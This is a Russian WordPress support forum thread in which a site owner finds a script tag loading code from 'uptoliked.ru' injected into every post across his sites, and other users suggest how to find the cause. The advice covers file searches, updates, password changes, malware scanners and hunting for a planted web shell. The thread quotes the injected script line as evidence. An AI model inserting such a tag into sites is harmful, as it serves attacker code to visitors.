Поддержка Проблемы и решения Появляются странные скрипты в записях

  • Всем привет. Вчера столкнулся с такой проблемой. Во всех записях появился код <script type="text/javascript" src="//uptoliked.ru/widjets.js"></script>
    я бы наверное даже не заметил, но перестали отображаться видеозаписи (отображается просто ссылка на ютюб). Начал искать подвох, удалил пару плагинов которые установил на днях и через базу данных отовсюду стёр данный скрипт. НО. Через пару часов эта строчка вновь появилась ВО ВСЕХ записях.

    Не знаю на что грешить. Из последнего, что я не удалил — это плагины: Secondary Title и Video Thumbnails. Также встроил в код кнопки соц сетей через Яндекс Блок «Поделиться».

Просмотр 15 ответов — с 1 по 15 (всего 47)
  • поиском по файлам по темам и плагинам.
    ищите данный урл.

    и в любом случае — обновляйте все от движка до плагинов и меняйте везде пароли.

    Flector
    По всей папке с сайтом искал ссылку, но безрезультатно. ((

    Не знаю на что грешить.

    На уязвимость в теме, скачанной с помойки — 99% случаев.
    См ссылки тут:
    http://ru.forums.wordpress.org/topic/%d0%9f%d0%be%d0%bc%d0%be%d0%b3%d0%b8%d1%82%d0%b5-%d1%81-%d0%b3%d1%80%d1%8f%d0%b7%d0%bd%d1%8b%d0%bc-%d1%88%d0%b0%d0%b1%d0%bb%d0%be%d0%bd%d0%be%d0%bc#post-144560

    SeVlad
    с wordpress.org качал её и проблем же не было до вчера

    с wordpress.org качал её

    Там могут быть и древние темы, с известными уязвимостями. Вы на дату обновления темы обращали внимание?

    Ну и кроме тем есть ещё и плагины и др.

    SeVlad
    В этом году обновлялась

    Удалил код кнопок социальных сетей от яндекса, пока все нормально, посмотрим дальше что будет

    фигня это всё. Опять тоже самое
    Самое, что удивительное — это то, что вчера я поменял пароль и всё было ок до сегодня, пока я не зашел в админку с телефона. Не знаю связанно ли это, но хотелось бы уже найти причину.

    дырявая тема\плагин.
    проверяйте каким-нибудь «айболитом«.

    Опять тоже самое
    Самое, что удивительное — это то, что вчера я поменял пароль и всё было ок до сегодня, пока я не зашел в админку с телефона. Не знаю связанно ли это, но хотелось бы уже найти причину.

    Если не поможет совет Flector-a — тогда стоит обратиться к специалистам.

    Похоже, ваш сайт взломали. Я встретился с подобным на нескольких сайтах — везде такие же симптомы, как и у вас. Причем этот код сопровождается шелом, через который размещают ссылки с биржи linkfeed.ru. Ищите файлы *.db и посторонние php файлы. Так же посмотрите footer.php, functions.php и файл htaccess.

    Ребят, всем спасибо за отзывы. Айболитом проверил — результатов 0. Скажу вам больше. Я сейчас решил проверить все остальные свои сайты и что вы думаете? Везде эта фигня в записях. Все сайты на одном хостинге! Писать в тех поддержку? Я так полагаю это вирусы на хостинге или сам хостинг вытворяет фигню.

    Возможно вы используете на всех сайтах плагин с уязвимостью. Проверьте установленные плагины с помощью плагина Plugin Vulnerabilities.

    tiaurus

    проверил, тоже ничего не нашел. посмотрел какие плагины совпадают. Совпадает только один — Cyr to Lat enhanced
    Уже не знаю что делать

    А какую вы тему используете? Везде разные? Можете заархивировать тему зараженного сайта и дать ссылку?

    кстати не факт, что поломали именно wordpress.
    могли и сам сервер поломать.

    вам сейчас надо найти куда прописался шелл.
    название файла — а потом уже в логах его найти и искать, через что и как пролезли на сервер.

Просмотр 15 ответов — с 1 по 15 (всего 47)
  • Тема «Появляются странные скрипты в записях» закрыта для новых ответов.